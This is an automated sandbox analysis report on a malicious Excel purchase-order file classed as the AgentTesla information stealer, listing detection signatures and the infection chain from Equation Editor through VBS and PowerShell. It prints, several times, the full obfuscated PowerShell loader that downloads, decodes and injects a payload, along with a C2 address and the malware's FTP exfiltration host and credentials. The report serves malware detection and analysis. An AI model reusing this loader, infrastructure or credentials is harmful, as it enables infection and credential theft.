Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Orden de Compra No. 78986756565344657.xlam.xlsx

Overview

General Information

Sample name:Orden de Compra No. 78986756565344657.xlam.xlsx
Analysis ID:1540838
MD5:6d622d241526560dcfd39335c249cd6e
SHA1:cc0d6a0f1cab1b41ef8553318b126225f8604f34
SHA256:36cb95a3f8294818da3c9561fa21681028e4e878dcb938ca5a43d36c46e31a9e
Tags:xlamxlsxuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3252 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3492 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • AddInProcess32.exe (PID: 3940 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.elquijotebanquetes.com", "Username": "mybloddycockcpanel_owner@elquijotebanquetes.com", "Password": "4r@d15PS!-!h"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bd2:$s1: <legacyDrawing r:id="
  • 0x1bfa:$s2: <oleObject progId="
  • 0x1c30:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 9 entries
            SourceRuleDescriptionAuthorStrings
            9.2.powershell.exe.74eab28.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.powershell.exe.74eab28.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                10.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  10.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    10.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 10 entries

                      Exploits

                      barindex
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.46.178.134, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wednesdaysMPDW-constraints[1].vbs

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdl
                      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3492, Protocol: tcp, SourceIp: 198.46.178.134, SourceIsIpv6: false, SourcePort: 80
                      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wj
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wj
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3T